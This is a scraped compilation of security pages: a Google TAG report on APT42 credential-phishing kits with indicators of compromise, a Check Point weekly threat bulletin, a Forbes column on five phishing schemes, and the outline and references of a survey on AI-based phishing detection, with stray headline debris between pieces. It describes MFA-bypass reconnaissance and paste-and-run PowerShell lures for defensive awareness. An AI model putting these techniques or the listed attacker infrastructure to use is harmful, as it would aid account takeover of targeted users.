GCollection/LCollection/YCollection: a sophisticated credential harvesting tool observed by TAG, capable of gathering credentials from Google, Hotmail and Yahoo users respectively. This kit has seen consistent development since it was first observed in use by APT42 in January 2023. The current version implements a seamless flow that supports multi-factor authentication, device PINs and one-time recovery codes in all 3 platforms. A set of landing page URLs are included with the indicators of compromise.
DWP: a browser-in-the-browser phishing kit often delivered via URL shortener that is less full featured than GCollection.

This spear phishing is supported by reconnaissance, using open-source marketing and social media research tools to identify personal email addresses that might not have default multi-factor authentication or other protection measures that are commonly seen on corporate accounts.

APT42 has also developed a strong understanding of the email providers they target, often researching the security settings of accounts they’re targeting using failed login or recovery workflows to determine the configured second factor for authentication to better target their initial phishing attempts. For example, in some cases they have identified that an account is configured to use Device Prompts as an accepted second factor and added support for them in their GCollection phishing kit. APT42 then combines this approach with knowledge of the target's current geographic location based on either public research or social engineering. As a result, APT42 login and recovery attempts often originate from the correct geographic location with the correct credentials and correct second factor for user authentication.

Once APT42 gains access to an account, they often add additional mechanisms of access including changing recovery email addresses and making use of features that allow applications that do not support multi-factor authentication like application specific passwords in Gmail and third-party app passwords in Yahoo. Google’s Advanced Protection Program revokes and disables these application specific passwords in Gmail, protecting users from this tactic.

Google Threat Intelligence Group, inclusive of TAG and Mandiant , helps identify, monitor and tackle threats, ranging from coordinated influence operations to cyber espionage campaigns against high-risk entities. TAG tracks and works to disrupt more than 270 government-backed attacker groups from more than 50 countries, and we regularly publish our findings to keep the public informed of these threats.

As we outlined above, APT42 is a sophisticated, persistent threat actor and they show no signs of stopping their attempts to target users and deploy novel tactics. This spring and summer, they have shown the ability to run numerous simultaneous phishing campaigns, particularly focused on Israel and the U.S. As hostilities between Iran and Israel intensify, we can expect to see increased campaigns there from APT42.

We also remain vigilant for targeting around the U.S. election and encourage all high-risk individuals including elected officials, candidates, campaign workers, journalists, election workers, government officials, and others to sign up for Google’s Advanced Protection Program . APP is a free, opt-in program designed to protect targeted users against such tactics, preventing unauthorized users from signing into an account even if they know the password.

Indicators of Compromise

Apt42 domains and urls.

DWP Phishing Kit related

accredit-navigation[.]online

hXXps://n9[.]cl/4xgro

GCollection Phishing Kit related

panel-short-check[.]live

check-pabnel-status[.]live

meetroomonlin1925.w3spaces[.]com

smaaaal[.]cfd

click-choose-figured[.]cfd

short-ion-per[.]live

checking-paneling[.]live

hXXps://panel-short-check[.]live/PhyfkFQX

hXXps://check-pabnel-status[.]live/Gcollection/Ref/CkliPwaM

hXXps://check-pabnel-status[.]live/Gcollection/Password

hXXps://panel-short-check[.]live/ZZqt3LYD

hXXps://check-pabnel-status[.]live/Lcollection/Ref/F53OQQkE

hXXps://check-pabnel-status[.]live/Lcollection/Password

hXXps://meetroomonlin1925.w3spaces[.]com/

hXXps://smaaaal[.]cfd/Wp59tqKU

hXXps://click-choose-figured[.]cfd/Gallery/Ref/FSaEM5gG

hXXps://click-choose-figured[.]cfd/Gallery/Password

hXXps://short-ion-per[.]live/08EFNZ1

hXXps://checking-paneling[.]live/aliasauthG/Password

hXXps://checking-paneling[.]live/aliasauthG/autoref/vNSX6c2m

understandingthewar[.]org

brookings[.]email

sharedrive.webredirect[.]org

visioneditor.loseyourip[.]com

s3api[.]shop

hXXps://sharedrive.webredirect[.]org/Khn/shoaGzA/cGNt/dMPaV/kvvhK

hXXps://firebasestorage.googleapis[.]com/v0/b/share-box-5f395.appspot.com/o/onedrive-qrty45.html

hXXps://visioneditor.loseyourip[.]com

hXXps://s3api[.]shop/api/

APT42 Samples (SHA256)

c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32 (NEWSTERMINAL)

bc2597ce09987022ff0498c6710a9b51a1a47ed8082ac044be2838b384157527 ( OFFICEFUEL)

baac058ddfc96c8aea8c0057077505f0ad3ff20311d999886fed549924404849 ( OFFICEFUEL)

0180f4f29c550aa1ffaa21af51711b29de99fb1d7c932d008a0e9356ae8a7d60 ( FUELDUMP )

f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060 ( FUELDUMP )

82ae2eb470a5a16ca39ec84b387294eaa3ae82e5ada4b252470c1281e1f31c0a (FUELDUMP)

89c1d1b61d7f863f8a651726e29f2ae3de7958f36b49a756069021817947d06c (FUELDUMP)

c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 (GORBLE PS - LNK)

33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 ( GORBLE PS - Stage 1)

4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f ( GORBLE PS - Stage 2)

APT42 - IPs Addresses

49.13.194[.]118 (C2 - OFFICEFUEL/FUELDUMP)

91.107.150[.]184 (C2 - OFFICEFUEL/FUELDUMP)

The next step in our fight against spyware

Google joined several other U.S. technology companies in filing an amicus brief in Dada v NSO Group Technologies.

Introducing the Coalition for Secure AI (CoSAI) and founding member organizations

Passkeys are now available for high risk users to enroll in the Advanced Protection Program

Google disrupted over 10,000 instances of dragonbridge activity in q1 2024.

Today we are sharing updated insights about DRAGONBRIDGE, the most prolific IO actor Google’s Threat Analysis Group (TAG) tracks.

TAG Bulletin: Q2 2024

Our bulletin covering coordinated influence operation campaigns terminated on our platforms in Q2 2024.

FILTER BY YEAR

12th August – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 12th August, please download our Threat Intelligence Bulletin .

TOP ATTACKS AND BREACHES

Financial data systems of The Grand Palais which hosts Olympic events in France, were targeted by an undisclosed ransomware group. As part of the attack, also the financial systems of around 40 other French museums, including the Louvre and Grand Palais, were affected. The attack didn’t affect the museum’s operations nor the core Olympic systems.
The city of Killeen, Texas, was hit by ransomware attack, disrupting essential services and exposing sensitive data. The attack was attributed to the BlackSuit ransomware group, a rebrand of a gang responsible for shutting down Dallas last year.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Wins.BlackSuite, Ransomware.Wins.BlackSuit, Ransomware_Linux_BlackSuit)

Sumter County Sheriff’s Office confirmed it had suffered a ransomware attack. Rhysida ransomware group claimed responsibility for the attack, and allegedly exfiltrated data including passports, Social Security numbers, amongst other confidential data and documents.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Rhysida; Ransomware.Wins.Rhysida)

Michigan non-profit hospital network McLaren, was hit with a ransomware attack. The attack, attributed to INC ransom group, disrupted the network’s IT and phone systems of 13 hospitals.
911 emergency services were disrupted in the region of Central Texas for a day, due to DDoS attack. Threat actors used a large amount of fake robocalls (automated phone calls) which crashed the 911 emergency phonelines, affecting call qualities or blocking the emergency from going through at all.
Classroom management platform Mobile Guardian has announced that it had been affected by a cybersecurity breach. The attack has allowed an attacker to unenroll and wipe more than 13,000 iPad and Chromebook devices. Mobile Guardian has suspended its service due to the attack.
A massive data breach of a scraping service, operated by background check company National Public Data (AKA Jerico Pictures), has exposed personal information of approximately 2.9 billion people. The stolen database was initially listed for sale by the USDoD threat actor for $3.5 million, was later partially leaked for free on the notorious BreachForums. It contains sensitive data such as names, addresses, dates of birth, and Social Security numbers.
SOCRadar had reportedly suffered a data breach, due to a vulnerable configuration flow which allowed cybercriminals to scrape database of 322 million emails from the cybersecurity firm. The threat actor who claimed to scrape the data, USDoD, alleged the data was compiled by SOCRadar from previous breaches and leaks. The claim is still not confirmed.

VULNERABILITIES AND PATCHES

Microsoft reported 4 vulnerabilities discovered in OpenVPN, a popular open-source project which is integrated into many IP devices worldwide. The flaws (CVE-2024-27459, CVE-2024-24974, CVE-2024-27903, CVE-2024-1305) could allow attackers to gain local privilege escalation as well as remote code execution. OpenVPN has patched the vulnerabilities in its 2.6.10 version release.
Google has patched a high-severity zero-day vulnerability (CVE-2024-36971) affecting Android devices. The Linux kernel flaw, seen actively exploited in the wild, allows attackers to remotely execute code on affected devices.
Akamai researchers discovered vulnerabilities in Ivanti Connect Secure and FortiGate VPNs. The flaws (CVE-2024-37374, CVE-2024-37375) can allow a user initial access to and control over a compromised VPN server. Attackers can use this to manipulate VPN functionalities or intercept sensitive information like external authentication credentials. At the time the report was published, Ivanti have yet to release a patch and Fortinet decided not to fix the custom encryption key bypass.
Cisco has released an advisory for critical vulnerabilities affecting the Web UI for its SPA300 and SPA500 IP Phones. The flaws (CVE-2024-20450, CVE-2024-20454) allow attackers arbitrary command executions as well as causing a denial-of-service condition. Cisco has announced that it is not planning to fix the vulnerabilities as the products have entered end-of-life.

THREAT INTELLIGENCE REPORTS

Researchers warn of a large, ongoing Magniber ransomware campaign. The threat actors target home users rather than firms and appear to use trojanized software crack downloaders as an initial attack vector. The ransomware encrypts files on the device and appends a random 5-9 character extension, like .oaxysw or .oymtk, to encrypted file names. The ransom note demands $1,000-$5,000 from each victim.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Wins.Magniber)

Researchers have identified a new attack vector that exploits the Windows Update process to downgrade software versions, allowing attackers to reintroduce vulnerabilities that have been patched. The downgrading process bypasses all verification steps, including integrity verification and Trusted Installer enforcement. Downgraded OS presents as fully updated and unable to install future updates, thus rendering the system vulnerable to attacks.
The Chameleon Device-Takeover Trojan has resurfaced in new campaigns targeting Canada and Europe. The malware, affecting Android devices, now masquerades as a Customer Relationship Management (CRM) app. This campaign was seen targeting hospitality employees, particularly within a Canadian restaurant chain operating internationally. Once installed, Chameleon collects credentials via keylogging and fake login pages, posing significant risks to business banking accounts.

Check Point Harmony Mobile provides protection against this threat

BLOGS AND PUBLICATIONS

Check Point Research Publications
Threat Research

“The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign

The 2020 Cyber Security Report

StealthLoader Malware Leveraging Log4Shell

SUBSCRIBE TO CYBER INTELLIGENCE REPORTS

Country —Please choose an option— China India United States Indonesia Brazil Pakistan Nigeria Bangladesh Russia Japan Mexico Philippines Vietnam Ethiopia Egypt Germany Iran Turkey Democratic Republic of the Congo Thailand France United Kingdom Italy Burma South Africa South Korea Colombia Spain Ukraine Tanzania Kenya Argentina Algeria Poland Sudan Uganda Canada Iraq Morocco Peru Uzbekistan Saudi Arabia Malaysia Venezuela Nepal Afghanistan Yemen North Korea Ghana Mozambique Taiwan Australia Ivory Coast Syria Madagascar Angola Cameroon Sri Lanka Romania Burkina Faso Niger Kazakhstan Netherlands Chile Malawi Ecuador Guatemala Mali Cambodia Senegal Zambia Zimbabwe Chad South Sudan Belgium Cuba Tunisia Guinea Greece Portugal Rwanda Czech Republic Somalia Haiti Benin Burundi Bolivia Hungary Sweden Belarus Dominican Republic Azerbaijan Honduras Austria United Arab Emirates Israel Switzerland Tajikistan Bulgaria Hong Kong (China) Serbia Papua New Guinea Paraguay Laos Jordan El Salvador Eritrea Libya Togo Sierra Leone Nicaragua Kyrgyzstan Denmark Finland Slovakia Singapore Turkmenistan Norway Lebanon Costa Rica Central African Republic Ireland Georgia New Zealand Republic of the Congo Palestine Liberia Croatia Oman Bosnia and Herzegovina Puerto Rico Kuwait Moldov Mauritania Panama Uruguay Armenia Lithuania Albania Mongolia Jamaica Namibia Lesotho Qatar Macedonia Slovenia Botswana Latvia Gambia Kosovo Guinea-Bissau Gabon Equatorial Guinea Trinidad and Tobago Estonia Mauritius Swaziland Bahrain Timor-Leste Djibouti Cyprus Fiji Reunion (France) Guyana Comoros Bhutan Montenegro Macau (China) Solomon Islands Western Sahara Luxembourg Suriname Cape Verde Malta Guadeloupe (France) Martinique (France) Brunei Bahamas Iceland Maldives Belize Barbados French Polynesia (France) Vanuatu New Caledonia (France) French Guiana (France) Mayotte (France) Samoa Sao Tom and Principe Saint Lucia Guam (USA) Curacao (Netherlands) Saint Vincent and the Grenadines Kiribati United States Virgin Islands (USA) Grenada Tonga Aruba (Netherlands) Federated States of Micronesia Jersey (UK) Seychelles Antigua and Barbuda Isle of Man (UK) Andorra Dominica Bermuda (UK) Guernsey (UK) Greenland (Denmark) Marshall Islands American Samoa (USA) Cayman Islands (UK) Saint Kitts and Nevis Northern Mariana Islands (USA) Faroe Islands (Denmark) Sint Maarten (Netherlands) Saint Martin (France) Liechtenstein Monaco San Marino Turks and Caicos Islands (UK) Gibraltar (UK) British Virgin Islands (UK) Aland Islands (Finland) Caribbean Netherlands (Netherlands) Palau Cook Islands (NZ) Anguilla (UK) Wallis and Futuna (France) Tuvalu Nauru Saint Barthelemy (France) Saint Pierre and Miquelon (France) Montserrat (UK) Saint Helena, Ascension and Tristan da Cunha (UK) Svalbard and Jan Mayen (Norway) Falkland Islands (UK) Norfolk Island (Australia) Christmas Island (Australia) Niue (NZ) Tokelau (NZ) Vatican City Cocos (Keeling) Islands (Australia) Pitcairn Islands (UK)

We value your privacy!

BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies.

More From Forbes

Five offbeat phishing schemes to know: new twists on classic scams.

Share to Facebook
Share to Twitter
Share to Linkedin

Stu Sjouwerman is the founder and CEO of KnowBe4 Inc. , a security awareness training and simulated phishing platform.

Nearly every security incident begins with some kind of social engineering or phishing attack. What’s even more worrisome is that phishing volume itself is growing year over year. Adversaries are perpetually updating their tactics to avoid detection. Below are five interesting phishing scams that recently made headlines for their offbeat character.

1. State-Sponsored Cybercriminals Target Prominent Businesspeople

In the first half of the year, MenloLabs uncovered three novel phishing campaigns that were specifically designed to target high-value assets such as C-level executives at finance services, legal firms, government agencies and leading healthcare providers. About 40,000 individuals are believed to have been compromised by these phishing attacks.

Novel, innovative threat campaigns involved the use of sophisticated Microsoft impersonations, evasive tactics that included dynamic phishing sites, custom HTTP headers, tracking cookies, bot detection countermeasures, encrypted code, server-side generated phishing pages and adversary in the middle (AiTM) techniques capable of defeating or bypassing multifactor authentication security.

2. Rise Of Phishing Attacks Targeting Weight-Loss Patients

The market for anti-obesity drugs has been rising exponentially. Scammers are swift to capitalize on these trends.

Today’s NYT Mini Crossword Clues And Answers For Monday, August 18

Nyt ‘strands’ hints, spangram and answers for monday, august 19th, a notorious marine battalion has joined ukraine’s invasion of russia.

In the first four months of 2024, McAfee’s Threat Research team noted a 183% rise in malicious phishing attempts centered around popular weight-management drugs like Ozempic, Wegovy and Semaglutide. Researchers discovered a total of 449 scam websites and 176,871 phishing attempts where scammers targeted individuals looking to purchase these drugs online. Some scammers offered these drugs at a steep discount. Others posed as doctors located outside the U.S., offering these drugs without a prescription.

3. Phishing Emails Trick Users Into Running Control Paste Command

In an interesting new tactic, threat researchers at Ahnlab encountered a case where threat actors send a phishing email to prompt victims to open an HTML attachment.

When the victim opens it, a dialog box disguised as an MS Word error message appears, asking the recipient to click on the “how to fix” link to view the document online. Upon clicking on the link, the victim is again prompted to enter [Win+R] -> [Ctrl + V] -> [Enter]. In other words, the user is asked to open the PowerShell Terminal, paste a PowerShell command and then run it. When a victim follows these steps, malware code is downloaded.

4. Hacked Customer Portal Delivers Phishing Emails

Hackers are known to use phishing botnets to deliver mass phishing emails. Phishing botnets are basically a network of infected computers hijacked by threat actors and used to send phishing emails. Since these emails are sent from a legitimate source, there is a higher probability that victims will open or click on associated attachments.

On similar lines, attackers have begun hijacking customer portals to deliver phishing emails because these portals are trusted by users. The helpdesk portal of Canadian router manufacturer Mercku was hacked. Adversaries then updated the tool to send phishing emails in response to every new customer support ticket. In addition, attackers abused the user info part of the URL to make the phishing links appear more credible.

Again, this tactic isn’t new; hackers are known to use common file extensions or add random text to shortened links to appear more genuine and able to evade detection.

5. Phishing Attack Exploits Windows Search Functionality

The research wing of Trustwave, SpiderLabs , recently detected a new kind of phishing scam that leverages the Windows Search functionality to deploy malware.

Here is how this works: Threat actors send phishing emails containing malicious attachments to victims. The attachment is basically an HTML file that is wrapped in a ZIP archive to avoid detection. Once a victim unzips and opens the attachment, the HTML file abuses standard web protocols to exploit Windows system functionalities. First, the browser prompts the user to allow the search action, and if access is granted, the attacker is able to open Windows Explorer directly and perform a search based on the parameters specified by the threat actor.

This attack is a great example of the level of understanding attackers have of system vulnerabilities and user behavior.

How Can Organizations Mitigate These Phishing Threats?

These best practices can help organizations mitigate phishing threats to a great extent.

• Train Your Users: Subject users to simulated phishing exercises regularly so that they form a habit of detecting and reporting fraudulent messages. Teach security best practices, such as thinking before you click, avoiding opening attachments from untrusted or unknown sources, watching out for phishing red flags , using a password manager and enabling multifactor authentication (MFA).

• Upgrade To Phishing-Resistant MFA: This extra layer of security prevents hackers from gaining access even if user credentials are stolen. However, avoid using ordinary MFA tools as these are prone to phishing attacks. Instead, use phishing-resistant MFA solutions that incorporate factors such as biometrics, pin codes and smart cards for authentication.

• Update Systems, Software And Tools: Always keep systems and devices updated with the latest firmware to prevent threat actors from exploiting vulnerabilities and potentially hijacking them for phishing or hacking purposes.

By closely monitoring phishing trends, one can see these tactics are essentially old wine in new bottles. The fundamental nature of phishing—replicating authentic communications to deceive individuals into taking action—remains unchanged.

Therefore, if employees are educated to exercise greater vigilance and confront content with skepticism, many of these fraudulent schemes and cyberattacks could be thwarted and identified promptly, mitigating any potential spread of harm to organizations.

Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs and technology executives. Do I qualify?

Editorial Standards
Reprints & Permissions

A comprehensive survey of AI-enabled phishing attacks detection techniques

Published: 23 October 2020
Volume 76 , pages 139–154, ( 2021 )

Cite this article

Abdul Basit 1 ,
Maham Zafar 1 ,
Xuan Liu ORCID: orcid.org/0000-0002-7966-4488 2 ,
Abdul Rehman Javed 3 ,
Zunera Jalil 3 &
Kashif Kifayat 3

47k Accesses

163 Citations

4 Altmetric

Explore all metrics

Classification of Phishing Attack Solutions by Employing Deep Learning Techniques: A Systematic Literature Review

A Survey on Phishing Website Detection Using Deep Neural Networks

An Exploratory Study of Automated Anti-phishing System

Explore related subjects.

Artificial Intelligence

Avoid common mistakes on your manuscript.

1 Introduction

Phishing attack diagram [ 26 ]

Phishing report for third quarter of the year 2019 [ 1 ]

Most targeted industry sectors—3rd quarter 2019 [ 3 ]

Taxonomy of this survey focusing on phishing attack detection studies

Keeping in sight the above limitations, this article makes the following contributions:

Provide a comprehensive and easy-to-follow survey focusing on deep learning, machine learning, hybrid learning, and scenario-based techniques for phishing attack detection.

Provide an extensive discussion on various phishing attack techniques and comparison of results reported by various studies.

Provide an overview of current practices, challenges, and future research directions for phishing attack detection.

2 Literature survey

Deep learning for phishing attack detection

Machine learning for phishing attack detection

Scenario-based phishing attack detection

Hybrid learning based Phishing attack detection

2.1 Deep learning (DL) for phishing attack detection

2.2 Machine learning (ML) for phishing attack detection

Table 1 presents the summary of ML approaches for phishing websites detection. Table shows that some studies provide highly efficient results for phishing attack detection.

2.3 Scenario-based phishing attack detection

In this section, we provide a comparison of scenario-based phishing attack detection used by various researchers. The comparison of scenario-based techniques to detect a phishing attack is shown in Table 2 . Studies show that different scenarios worked with various methods and provides different outcomes.

Table 3 provides a comparison of RF classifiers with different datasets and different approaches. Some studies reduced features without creating a lot of impact on accuracy and the remaining studies focused on accuracy. Authors in Subasi et al. [ 57 ] used different classifiers to detect phishing attacks and they achieved an accuracy of 97.36% by RF algorithm.

2.4 Hybrid learning (HL) based phishing attack detection

In this section, we present the comparison of HL models which are used by state-of-the-art studies as shown in Tables 4 and 5 The studies show how the accuracies got improved by ensemble and HL techniques.

3 Discussion

4 Current practices and future challenges

5 Conclusion

Abbreviations

Support vector machine

Random forest

Instant base learner

Artificial neural network

Rotation forest

Decision forest

Enhanced dynamic rule induction

Linear regression

Classification and regression tree

Extreme gradient boost

Gradient boosting decision tree

Neural-networks

Gradient boosting machine

Generalized linear model

Navies Bayes

K-nearest neighbor

Combination extreme learning machine

Extreme learning machine

Random committee

Principle component analysis

(2016). Apwg trend report. http://docs.apwg.org/reports/apwg_trends_report_q4_2016.pdf . Accessed from 20 July 2020

(2018) Phishing activity trends report. http://docs.apwg.org/reports/apwg_trends_report_q2_2018.pdf . Accessed from 20 July 2020

(2019) Apwg trend report. https://docs.apwg.org/reports/apwg_trends_report_q3_2019.pdf . Accessed from 20 July 2020

(2019) Fbi warns of dramatic increase in business e-mail compromise (bec) schemes—fbi. https://www.fbi.gov/contact-us/field-offices/memphis/news/press-releases/fbi-warns-of-dramatic-increase-in-business-e-mail-compromise-bec-schemes . Accessed from 20 July 2020

(2019) What is phishing? https://www.phishing.org/what-is-phishing . Accessed from 20 July 2020

(2020) Coronavirus-related spear phishing attacks see 667% increase. https://www.securitymagazine.com/articles/92157-coronavirus-related-spear-phishing-attacks-see-667-increase-in-march-2020 . Accessed from 20 July 2020

(2020) Cost of black market phishing kits soars 149% in 2019. https://www.infosecurity-magazine.com/news/black-phishing-kits/ . Accessed from 20 July 2020

(2020) Recent phishing attacks. https://www.infosec.gov.hk/english/anti/recent.html . Accessed from 20 July 2020

Abdelhamid, N., Thabtah, F., Abdel-jaber, H. (2017). Phishing detection: A recent intelligent machine learning comparison based on models content and features. In 2017 IEEE international conference on intelligence and security informatics (ISI) (pp. 72–77). IEEE.

Adebowale, M. A., Lwin, K. T., Sanchez, E., & Hossain, M. A. (2019). Intelligent web-phishing detection and protection scheme using integrated features of images, frames and text. Expert Systems with Applications , 115 , 300–313.

Article Google Scholar

Aleroud, A., & Zhou, L. (2017). Phishing environments, techniques, and countermeasures: A survey. Computers and Security , 68 , 160–196.

Ali, W., & Malebary, S. (2020). Particle swarm optimization-based feature weighting for improving intelligent phishing website detection. IEEE Access , 8 , 116766–116780.

Alsariera, Y. A., Adeyemo, V. E., Balogun, A. O., & Alazzawi, A. K. (2020). Ai meta-learners and extra-trees algorithm for the detection of phishing websites. IEEE Access , 8 , 142532–142542.

Begum, A., & Badugu, S. (2020). A study of malicious url detection using machine learning and heuristic approaches. In Advances in decision sciences, security and computer vision, image processing (pp. 587–597). Berlin: Springer.

Benavides, E., Fuertes, W., Sanchez, S., & Sanchez, M. (2020). Classification of phishing attack solutions by employing deep learning techniques: A systematic literature review. In Developments and advances in defense and security (pp. 51–64). Springer.

Cabaj, K., Domingos, D., Kotulski, Z., & Respício, A. (2018). Cybersecurity education: Evolution of the discipline and analysis of master programs. Computers and Security , 75 , 24–35.

Chen, Y. H., & Chen, J. L. (2019). Ai@ ntiphish—machine learning mechanisms for cyber-phishing attack. IEICE Transactions on Information and Systems , 102 (5), 878–887.

Chiew, K. L., Yong, K. S. C., & Tan, C. L. (2018). A survey of phishing attacks: Their types, vectors and technical approaches. Expert Systems with Applications , 106 , 1–20.

Chiew, K. L., Tan, C. L., Wong, K., Yong, K. S., & Tiong, W. K. (2019). A new hybrid ensemble feature selection framework for machine learning-based phishing detection system. Information Sciences , 484 , 153–166.

Conklin, W. A., Cline, R. E., & Roosa, T. (2014). Re-engineering cybersecurity education in the us: An analysis of the critical factors. In 2014 47th Hawaii international conference on system sciences (pp. 2006–2014). IEEE.

Curtis, S. R., Rajivan, P., Jones, D. N., & Gonzalez, C. (2018). Phishing attempts among the dark triad: Patterns of attack and vulnerability. Computers in Human Behavior , 87 , 174–182.

El Aassal, A., Baki, S., Das, A., & Verma, R. M. (2020). An in-depth benchmarking and evaluation of phishing detection research for security needs. IEEE Access , 8 , 22170–22192.

Fatima, R., Yasin, A., Liu, L., & Wang, J. (2019). How persuasive is a phishing email? A phishing game for phishing awareness. Journal of Computer Security , 27 (6), 581–612.

Feng, Q., Tseng, K. K., Pan, J. S., Cheng, P., & Chen, C. (2011). New anti-phishing method with two types of passwords in openid system. In 2011 Fifth international conference on genetic and evolutionary computing (pp. 69–72). IEEE.

Ferrag, M. A., Maglaras, L., Moschoyiannis, S., & Janicke, H. (2020). Deep learning for cyber security intrusion detection: Approaches, datasets, and comparative study. Journal of Information Security and Applications , 50 , 102419.

Forecast. (2017). Global fraud and cybercrime forecast. https://www.rsa.com/en-us/blog/2016-12/2017-global-fraud-cybercrime-forecast . Accessed from 20 July 2020

Gupta, B. B., Tewari, A., Jain, A. K., & Agrawal, D. P. (2017). Fighting against phishing attacks: State of the art and future challenges. Neural Computing and Applications , 28 (12), 3629–3654.

Gupta, B. B., Arachchilage, N. A., & Psannis, K. E. (2018). Defending against phishing attacks: Taxonomy of methods, current issues and future directions. Telecommunication Systems , 67 (2), 247–267.

Hota, H., Shrivas, A., & Hota, R. (2018). An ensemble model for detecting phishing attack with proposed remove-replace feature selection technique. Procedia Computer Science , 132 , 900–907.

Hulten, G. J., Rehfuss, P. S., Rounthwaite, R., Goodman, J. T., Seshadrinathan, G., Penta, A. P., Mishra, M., Deyo, R. C., Haber, E. J., & Snelling, D. A. W. et al. (2014). Finding phishing sites . US Patent 8,839,418.

Hutchinson, S., Zhang, Z., & Liu, Q. (2018). Detecting phishing websites with random forest. In International conference on machine learning and intelligent communications (pp. 470–479). Springer.

Iwendi, C., Jalil, Z., Javed, A. R., Reddy, T., Kaluri, R., Srivastava, G., et al. (2020). Keysplitwatermark: Zero watermarking algorithm for software protection against cyber-attacks. IEEE Access , 8 , 72650–72660.

Jagadeesan, S., Chaturvedi, A., & Kumar, S. (2018). Url phishing analysis using random forest. International Journal of Pure and Applied Mathematics , 118 (20), 4159–4163.

Google Scholar

Jain, A. K., & Gupta, B. B. (2018). Towards detection of phishing websites on client-side using machine learning based approach. Telecommunication Systems , 68 (4), 687–700.

Jain, A. K., Parashar, S., Katare, P., & Sharma, I. (2020). Phishskape: A content based approach to escape phishing attacks. Procedia Computer Science , 171 , 1102–1109.

James, J., Sandhya, L., & Thomas, C. (2013). Detection of phishing urls using machine learning techniques. In 2013 International conference on control communication and computing (ICCC) (pp. 304–309). IEEE.

Javed, A. R., Jalil, Z., Moqurrab, S. A., Abbas, S., & Liu, X. (2020). Ensemble adaboost classifier for accurate and fast detection of botnet attacks in connected vehicles. Transactions on Emerging Telecommunications Technologies .

Javed, A. R., Usman, M., Rehman, S. U., Khan, M. U., & Haghighi, M. S. (2020). Anomaly detection in automated vehicles using multistage attention-based convolutional neural network. IEEE Transactions on Intelligent Transportation Systems , pp. 1–10.

Joshi, A., Pattanshetti, P., & Tanuja, R. (2019). Phishing attack detection using feature selection techniques. In International conference on communication and information processing (ICCIP), Nutan College of Engineering and Research .

Khonji, M., Iraqi, Y., & Jones, A. (2013). Phishing detection: A literature survey. IEEE Communications Surveys and Tutorials , 15 (4), 2091–2121.

Kumar, A., Chatterjee, J. M., & Díaz, V. G. (2020). A novel hybrid approach of svm combined with nlp and probabilistic neural network for email phishing. International Journal of Electrical and Computer Engineering , 10 (1), 486.

Li, Y., Yang, Z., Chen, X., Yuan, H., & Liu, W. (2019). A stacking model using url and html features for phishing webpage detection. Future Generation Computer Systems , 94 , 27–39.

Liew, S. W., Sani, N. F. M., Abdullah, M. T., Yaakob, R., & Sharum, M. Y. (2019). An effective security alert mechanism for real-time phishing tweet detection on twitter. Computers and Security , 83 , 201–207.

Mao, J., Bian, J., Tian, W., Zhu, S., Wei, T., Li, A., et al. (2018). Detecting phishing websites via aggregation analysis of page layouts. Procedia Computer Science , 129 , 224–230.

Mao, J., Bian, J., Tian, W., Zhu, S., Wei, T., Li, A., et al. (2019). Phishing page detection via learning classifiers from page layout feature. EURASIP Journal on Wireless Communications and Networking , 2019 (1), 43.

Maurya, S., & Jain, A. (2020). Deep learning to combat phishing. Journal of Statistics and Management Systems , pp. 1–13.

Mittal, M., Iwendi, C., Khan, S., & Rehman Javed, A. (2020). Analysis of security and energy efficiency for shortest route discovery in low-energy adaptive clustering hierarchy protocol using Levenberg–Marquardt neural network and gated recurrent unit for intrusion detection system. Transactions on Emerging Telecommunications Technologies , p. e3997.

Niranjan, A., Haripriya, D., Pooja, R., Sarah, S., Shenoy, P. D., & Venugopal, K. (2019). Ekrv: Ensemble of knn and random committee using voting for efficient classification of phishing. In Progress in advanced computing and intelligent engineering (pp. 403–414). Springer.

Ollmann, G. (2004). The phishing guide understanding and preventing phishing attacks . NGS Software Insight Security Research.

Pandey, A., Gill, N., Nadendla, K. S. P., & Thaseen, I. S. (2018). Identification of phishing attack in websites using random forest-svm hybrid model. In International conference on intelligent systems design and applications (pp. 120–128). Springer.

Parekh, S., Parikh, D., Kotak, S., & Sankhe, S. (2018). A new method for detection of phishing websites: Url detection. In 2018 Second international conference on inventive communication and computational technologies (ICICCT) (pp. 949–952). IEEE.

Parsons, K., Butavicius, M., Delfabbro, P., & Lillie, M. (2019). Predicting susceptibility to social influence in phishing emails. International Journal of Human-Computer Studies , 128 , 17–26.

Patil, V., Thakkar, P., Shah, C., Bhat, T., & Godse, S. (2018). Detection and prevention of phishing websites using machine learning approach. In 2018 Fourth international conference on computing communication control and automation (ICCUBEA) (pp. 1–5). IEEE.

Sahingoz, O. K., Buber, E., Demir, O., & Diri, B. (2019). Machine learning based phishing detection from urls. Expert Systems with Applications , 117 , 345–357.

Shie, E. W. S. (2020). Critical analysis of current research aimed at improving detection of phishing attacks . Selected computing research papers, p. 45.

Subasi, A., & Kremic, E. (2020). Comparison of adaboost with multiboosting for phishing website detection. Procedia Computer Science , 168 , 272–278.

Subasi, A., Molah, E., Almkallawi, F., & Chaudhery, T. J. (2017). Intelligent phishing website detection using random forest classifier. In 2017 International conference on electrical and computing technologies and applications (ICECTA) (pp. 1–5). IEEE.

Tyagi, I., Shad, J., Sharma, S., Gaur, S., & Kaur, G. (2018). A novel machine learning approach to detect phishing websites. In 2018 5th International conference on signal processing and integrated networks (SPIN) (pp. 425–430). IEEE.

Ubing, A. A., Jasmi, S. K. B., Abdullah, A., Jhanjhi, N., & Supramaniam, M. (2019). Phishing website detection: An improved accuracy through feature selection and ensemble learning. International Journal of Advanced Computer Science and Applications , 10 (1), 252–257.

Volkamer, M., Renaud, K., Reinheimer, B., & Kunz, A. (2017). User experiences of torpedo: Tooltip-powered phishing email detection. Computers and Security , 71 , 100–113.

